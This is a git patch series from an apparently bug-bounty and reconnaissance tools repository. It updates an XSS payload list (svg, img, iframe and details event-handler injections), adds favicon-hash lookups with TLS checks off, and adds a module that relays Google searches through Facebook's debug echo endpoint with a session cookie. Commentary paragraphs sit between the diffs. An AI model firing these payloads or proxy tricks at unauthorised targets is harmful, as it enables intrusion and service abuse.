From 5873a1b601b63232233746360dd6f6a7642a661e Mon Sep 17 00:00:00 2001
From: Gwen
Date: Fri, 29 May 2020 19:17:24 +0200
Subject: [PATCH 01/11] new pl

---
 xss.py | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/xss.py b/xss.py
index eb03c80..d45f30f 100755
--- a/xss.py
+++ b/xss.py
@@ -296,12 +296,18 @@ def realDoTest( t_params ):
 	# source: https://twitter.com/brutelogic/status/1138805808328839170
 	if not n_payloads:
 		t_payloads = [
-			'\'"--><script>prompt(1)</script>',
+			'\'"--></script><svg onload=prompt(1)>',
 			'"autofocus onfocus=prompt(1)//',
-			'\'"--><svg onload=prompt(1)>',
-			"'-prompt(1)-'",
+			'\'"--><img src=x onerror=prompt(1)>.',
+			'\'"--><details open ontoggle=prompt(1)>',
+			'\'"--><body onload=prompt(1)>',
+			'"-prompt(1)-"',
 			"\\'-prompt(1)//",
-			'javascript:prompt(1)',
+			"'\")];*/prompt(1);/*",
+			'" onload=prompt(1)>',
+			'\'"--><iframe src=javascript:prompt(1)>',

From f75f239e3c1bb7a164c3488ed0ba844389676cc2 Mon Sep 17 00:00:00 2001
From: Gwen
Date: Fri, 26 Jun 2020 15:23:32 +0200
Subject: [PATCH 10/11] github sponsor

---
 .github/FUNDING.yml | 12 ++++++++++++
 1 file changed, 12 insertions(+)
 create mode 100644 .github/FUNDING.yml

diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 0000000..eb7b65a
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1,12 @@
+# These are supported funding model platforms
+
+github: [gwen001]
+patreon: # Replace with a single Patreon username
+open_collective: # Replace with a single Open Collective username
+ko_fi: # Replace with a single Ko-fi username
+tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
+community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
+liberapay: # Replace with a single Liberapay username
+issuehunt: # Replace with a single IssueHunt username
+otechie: # Replace with a single Otechie username
+custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

From a9af5c99ccf5fa997eb7a6ac0543a7d658c6173b Mon Sep 17 00:00:00 2001
From: Gwen
Date: Tue, 28 Jul 2020 08:21:38 +0200
Subject: [PATCH 11/11] fix goop regexp

---
 extract-endpoints.php | 62 +++++++++++++++++++++---------------------
 favicon-hashtrick.py  | 22 ++++++++++-----
 goop/__init__.py      |  1 +
 goop/goop.py          | 63 +++++++++++++++++++++++++++++++++++++++++++
 quickhits.py          |  2 +-
 5 files changed, 112 insertions(+), 38 deletions(-)
 create mode 100644 goop/__init__.py
 create mode 100644 goop/goop.py

diff --git a/extract-endpoints.php b/extract-endpoints.php
index 9a54993..e82f50b 100755
--- a/extract-endpoints.php
+++ b/extract-endpoints.php
@@ -360,9 +360,9 @@ function usage( $err=null ) {
 	} else {
 		$buffer = file_get_contents( $s );
 	}
-	
+
 	ob_start();
-	
+
 	if( $_mode == MODE_KEYWORD )
 	{
 		$ss = escapeshellcmd( $s );
@@ -373,14 +373,14 @@ function usage( $err=null ) {
 		echo $cmd."\n";
 		exec( $cmd, $output );
 		$n_sensitive = printColoredGrep( $_keywords_sensitive_regexp, implode("\n",$output), 1 );
-	
+
 		if( $_keywords_insensitive_regexp != $_keywords_sensitive_regexp ) {
 			$output = null;
 			$cmd = 'egrep -i -n "'.$_keywords_insensitive_regexp.'" "'.$ss.'"';
 			exec( $cmd, $output );
 			$n_insensitive = printColoredGrep( $_keywords_insensitive_regexp, implode("\n",$output), 0 );
 		}
-	
+
 		$n_total = $n_sensitive + $n_insensitive;
 		if( $_verbose < 2 ) {
 			echo $n_total." 
keywords found!\n"; @@ -415,8 +415,8 @@ function usage( $err=null ) { clean( $t_final ); $n_final = count($t_final); $n_possible = count($t_possible); - - if( $n_final ) { + + if( $n_final ) { $t_final = array_unique( $t_final ); $n_final = count( $t_final ); foreach( $t_final as $u ) { @@ -437,14 +437,14 @@ function usage( $err=null ) { if( $_verbose < 2 ) { echo $n_final." urls found!\n"; } - + if( $n_possible && $_verbose<2 ) { Utils::_println( str_repeat('-',100), 'light_grey' ); $t_possible = array_unique( $t_possible ); Utils::_println( implode( "\n",$t_possible), 'light_grey' ); Utils::_println( $n_possible." possible...", 'light_grey' ); } - + $n_total = $n_possible + $n_final; } @@ -475,9 +475,9 @@ function testUrl( $url, $follow_location ) curl_setopt( $c, CURLOPT_FOLLOWLOCATION, $follow_location ); curl_setopt( $c, CURLOPT_RETURNTRANSFER, true ); $r = curl_exec( $c ); - + $t_info = curl_getinfo( $c ); - + return $t_info['http_code']; } @@ -488,13 +488,13 @@ function printColoredGrep( $regexp, $str, $case_sensitive ) //$l = strlen( $str ); //$m = preg_match_all( '#'.$regexp.'#i', $str, $matches, PREG_OFFSET_CAPTURE ); //var_dump( $matches ); - + if( $case_sensitive ) { $flag = ''; } else { $flag = 'i'; } - + $colored = preg_replace( '#'.$regexp.'#'.$flag, "\033[0;32m".'\\1'."\033[0m", $str, -1, $cnt ); if( $cnt ) { echo $colored."\n"; @@ -515,7 +515,7 @@ function printColoredGrep( $regexp, $str, $case_sensitive ) //break; } } - + $s3 = substr( $str, $p ); Utils::_print( $s3, 'white' );*/ return $cnt; @@ -528,7 +528,7 @@ function run( $buffer ) //var_dump( $_regexp ); $t_all = []; - + foreach( $_regexp as $r ) { $m = preg_match_all( $r.'i', $buffer, $matches ); //var_dump( $matches ); @@ -537,7 +537,7 @@ function run( $buffer ) $t_all = array_merge( $t_all, $matches[1] ); } } - + $t_exclude_extension = [ ]; $t_exclude_domain = [ ]; $t_exclude_scheme = [ 'javascript', 'mailto', 'data', 'about', 'file' ]; @@ -552,13 +552,13 @@ function run( $buffer ) { //var_dump($url); //$url = urldecode( $url ); - + $test = preg_replace( '#[^0-9a-zA-Z]#', '', $url ); if( $test == '' ) { unset( $t_all[$k] ); continue; } - + $parse = parse_url( $url ); //var_dump($parse); if( !$parse ) { @@ -566,7 +566,7 @@ function run( $buffer ) $t_possible[] = $url; continue; } - + foreach( $t_exclude_string as $s ) { if( strstr($url,$s) ) { unset( $t_all[$k] ); @@ -574,7 +574,7 @@ function run( $buffer ) continue; } } - + foreach( $t_exclude_possible as $s ) { if( strstr($url,$s) ) { unset( $t_all[$k] ); @@ -582,37 +582,37 @@ function run( $buffer ) continue; } } - + if( isset($parse['scheme']) && in_array($parse['scheme'],$t_exclude_scheme) ) { unset( $t_all[$k] ); $t_possible[] = $url; continue; } - + if( isset($parse['path']) && is_array($_ignore) && count($_ignore) ) { $p = strrpos( $parse['path'], '.' 
);
 			if( $p !== false ) {
-				$ext = substr( $parse['path'], $p+1 ); 
+				$ext = substr( $parse['path'], $p+1 );
 				if( in_array($ext,$_ignore) ) {
 					unset( $t_all[$k] );
 					continue;
 				}
 			}
 		}
-		
+
 		if( $url[0] == '#' ) {
 			unset( $t_all[$k] );
 			$t_possible[] = $url;
 			continue;
 		}
-		
+
 		if( isset($parse['path']) )
 		{
 			if( strstr($parse['path'],' ') !== false ) {
 				$tmp = explode( ' ', $parse['path'] );
 				$parse['path'] = $tmp[0];
 			}
-			
+
 			$kk = preg_replace('|'.$_url_chars.'|i','',$parse['path']);
 			if( strlen($kk) != 0 ) {
 				unset( $t_all[$k] );
 				$t_possible[] = $url;
 				continue;
 			}
 		}
 	}
-	
+
 	//var_dump($t_all);
 	return [$t_all,$t_possible];
 }
@@ -630,16 +630,16 @@ function run( $buffer )
 function clean( &$t_urls )
 {
 	global $_scheme, $_host, $_ignore;
-	
+
 	$scheme = $host = '';
-	
+
 	foreach( $t_urls as &$u )
 	{
 		//var_dump( $u );
 		$scheme = $host = '';
 		$parse = parse_url( $u );
 		//var_dump( $parse );
-		
+
 		if( isset($parse['host']) ) {
 			$host = $parse['host'];
 		} elseif( $_host ) {
@@ -647,7 +647,7 @@ function clean( &$t_urls )
 			$u = ltrim( $u, '/' );
 			$u = $host . '/' . $u;
 		}
-		
+
 		if( isset($parse['scheme']) && $parse['scheme'] != NULL ) {
 			$scheme = $parse['scheme'];
 		} elseif( $host ) {
@@ -655,7 +655,7 @@ function clean( &$t_urls )
 			$u = ltrim( $u, '/' );
 			$u = $scheme . '://' . $u;
 		}
-		
+
 		if( strstr($u,' ') !== false ) {
 			$tmp = explode( ' ', $u );
 			$u = $tmp[0];
diff --git a/favicon-hashtrick.py b/favicon-hashtrick.py
index 112b695..ce606d0 100755
--- a/favicon-hashtrick.py
+++ b/favicon-hashtrick.py
@@ -15,6 +15,11 @@
 from colored import fg, bg, attr
 
+# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+
 def banner():
 	print("""
     __ _ _ _ _ _ _
@@ -29,8 +34,6 @@ def banner():
 	""")
 	pass
 
-banner()
-
 def faviconHash( data, web ):
 	if web:
@@ -53,6 +56,9 @@ def faviconHash( data, web ):
 parser.parse_args()
 args = parser.parse_args()
 
+if not args.silent:
+	banner()
+
 if args.values:
 	t_values = args.values.split(',')
 else:
@@ -77,10 +83,14 @@ def faviconHash( data, web ):
 	web_src = False
 
 if args.favurl:
-	favsource = args.favurl
-	r = requests.get( favsource )
-	data = r.content
-	web_src = True
+	favsource = args.favurl
+	try:
+		r = requests.get( favsource, timeout=3, verify=False )
+	except Exception as e:
+		sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
+		exit()
+	data = r.content
+	web_src = True
 
 if not args.favfile64 and not args.favfile and not args.favurl:
 	parser.error( 'missing favicon' )
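For context on what favicon-hashtrick.py computes: Shodan and similar engines index favicons by the MurmurHash3 of the base64-encoded file, using the line-wrapped encoding that base64.encodebytes() produces, so matching the http.favicon.hash filter means reproducing that exact encoding. A minimal standalone sketch of the hash, assuming the mmh3 and requests packages are installed; the URL below is only a placeholder:

```python
import base64

import mmh3      # MurmurHash3, the hash behind Shodan's http.favicon.hash filter
import requests

def favicon_hash( url ):
	# fetch the raw favicon; verify=False mirrors the script's handling of self-signed certs
	data = requests.get( url, timeout=3, verify=False ).content
	# encodebytes() keeps the newline every 76 characters that the indexed hash expects
	b64 = base64.encodebytes( data )
	return mmh3.hash( b64 )

# the resulting integer can then be searched as: http.favicon.hash:<value>
print( favicon_hash( 'https://example.com/favicon.ico' ) )
```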
diff --git a/goop/__init__.py b/goop/__init__.py
new file mode 100644
index 0000000..df9144c
--- /dev/null
+++ b/goop/__init__.py
@@ -0,0 +1 @@
+__version__ = '0.1.1'
diff --git a/goop/goop.py b/goop/goop.py
new file mode 100644
index 0000000..e7b5463
--- /dev/null
+++ b/goop/goop.py
@@ -0,0 +1,63 @@
+import re
+import requests
+
+try:
+    from urllib.parse import quote_plus as url_encode
+except ImportError:
+    from urllib import quote_plus as url_encode
+
+def decode_html(string):
+    "decode common html/xml entities"
+    new_string = string
+    decoded = ['>', '<', '"', '&', '\'']
+    encoded = ['&gt;', '&lt;', '&quot;', '&amp;', '&#39;']
+    for e, d in zip(encoded, decoded):
+        new_string = new_string.replace(e, d)
+    for e, d in zip(encoded[::-1], decoded[::-1]):
+        new_string = new_string.replace(e, d)
+    return new_string
+
+def parse(string):
+    "extract and parse results"
+    parsed = {}
+#    pattern = r'''<div class="[^"]+"><a href="/url\?q=(.*?)&amp;sa=U&amp;ved=[^"]+">
+#    <div class="[^"]+">(.*?)</div></a></div>
+#    <div class="[^"]+">
+#    (?:<span class="[^"]+">(.*?)</span>(?:&nbsp;<span class="[^"]+">...</span>)?</div>
+#    |\n<div class="[^"]+">.*?</div>.*?<span class="[^"]+">(.*?)</span>
+#    )'''
+    pattern = r'''<a href="/url\?q=(.*?)&amp;sa=U&amp;ved=[^"]+">'''
+    matches = re.finditer(pattern, string)
+    num = 0
+    for match in matches:
+        # parsed[num] = {'url' : match.group(1), 'text' : match.group(2), 'summary' : match.group(3) or match.group(4)}
+        parsed[num] = {'url' : match.group(1), 'text' : '', 'summary' : ''}
+        num += 1
+    return parsed
+
+def search(query, cookie, page=0, full=False):
+    """
+    main function, returns parsed results
+    Args:
+        query - search string
+        cookie - facebook cookie
+        page - search result page number (optional)
+    """
+    offset = page * 10
+    filter = 1 if not full else 0
+    escaped = url_encode('https://google.com/search?q=%s&start=%i&filter=%i' % (url_encode(query), offset, filter))
+    headers = {
+        'Host': 'developers.facebook.com',
+        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+        'Accept-Language': 'en-US,en;q=0.5',
+        'Accept-Encoding': 'deflate',
+        'Connection': 'keep-alive',
+        'Cookie': cookie,
+        'Upgrade-Insecure-Requests': '1',
+        'Cache-Control': 'max-age=0',
+        'TE': 'Trailers'
+    }
+    response = requests.get('https://developers.facebook.com/tools/debug/echo/?q=%s' % escaped, headers=headers)
+    cleaned_response = decode_html(response.text)
+    parsed = parse(cleaned_response)
+    return parsed
diff --git a/quickhits.py b/quickhits.py
index ed54682..b390019 100755
--- a/quickhits.py
+++ b/quickhits.py
@@ -93,7 +93,7 @@ def testURL( url ):
 #		url = url.strip('_')
 
 	match = title_regexp.search( r.text )
-	title = match.group(1) if match else '-'
+	title = match.group(1).strip() if match else '-'
 
 	ljust = 100
 	while ljust < len(url):
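For context, goop works by bouncing the Google query off Facebook's debug echo endpoint using a logged-in Facebook session, then HTML-entity-decoding the echoed page and extracting result URLs with the regexp above. A minimal usage sketch of the module added in this patch; the cookie value is a placeholder you must replace with a real Facebook session cookie string:

```python
from goop import goop

# placeholder: supply the cookie string of a logged-in Facebook session
cookie = 'datr=...; c_user=...; xs=...'

# fetch the first two result pages for a query and print the extracted URLs
for page in range( 2 ):
	results = goop.search( 'site:example.com login', cookie, page=page )
	for num in results:
		print( results[num]['url'] )
```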